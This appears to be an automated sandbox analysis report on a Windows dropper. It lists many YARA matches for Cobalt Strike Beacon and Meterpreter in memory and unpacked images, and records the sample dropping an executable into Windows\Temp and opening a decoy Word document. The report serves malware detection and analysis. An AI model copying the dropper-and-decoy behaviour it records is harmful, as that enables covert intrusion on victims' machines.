Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000003.00000002.706923007.000000C0002D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.705984762.000000C000174000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000003.00000002.706488711.000000C00023E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: C:\Windows\Temp\????????????.exeCode function: String function: 01332C40 appears 247 times
Source: C:\Windows\Temp\????????????.exeCode function: String function: 01330BA0 appears 191 times
Source: C:\Windows\Temp\????????????.exeCode function: String function: 013323C0 appears 39 times
Source: C:\Windows\System32\cmd.exeSection loaded: sfc.dll
Source: 1a#U77e5.exeStatic PE information: Number of sections : 14 > 10
Source: ????????????.exe.0.drStatic PE information: Number of sections : 13 > 10
Source: 1a#U77e5.exeStatic PE information: Section: /19 ZLIB complexity 0.9987782579787234
Source: 1a#U77e5.exeStatic PE information: Section: /32 ZLIB complexity 0.9890455163043478
Source: 1a#U77e5.exeStatic PE information: Section: /65 ZLIB complexity 0.9983048349056604
Source: 1a#U77e5.exeStatic PE information: Section: /78 ZLIB complexity 0.9892698688271605
Source: ????????????.exe.0.drStatic PE information: Section: /19 ZLIB complexity 0.9949880125661376
Source: ????????????.exe.0.drStatic PE information: Section: /32 ZLIB complexity 0.9894425675675675
Source: ????????????.exe.0.drStatic PE information: Section: /65 ZLIB complexity 0.9975082694986073
Source: ????????????.exe.0.drStatic PE information: Section: /78 ZLIB complexity 0.9895907315340909
Source: 1a#U77e5.exeVirustotal: Detection: 61%
Source: 1a#U77e5.exeMetadefender: Detection: 22%
Source: 1a#U77e5.exeReversingLabs: Detection: 76%
Source: 1a#U77e5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1a#U77e5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\1a#U77e5.exe "C:\Users\user\Desktop\1a#U77e5.exe"
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\Temp\????????????.exe C:\Windows\Temp\????????????.exe 9gb3vbgeng
Source: C:\Windows\Temp\????????????.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start ?????????????????????.docx
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o "
Source: C:\Windows\Temp\????????????.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: ?????????????????????.LNK.7.drLNK file: ..\..\..\..\..\Desktop\.docx
Source: C:\Users\user\Desktop\1a#U77e5.exeFile created: C:\Users\user\Desktop\?????????????????????.docx
Source: C:\Users\user\Desktop\1a#U77e5.exeFile created: C:\Windows\Temp\????????????.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@10/8@0/1
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: 1a#U77e5.exeStatic file information: File size 4732928 > 1048576
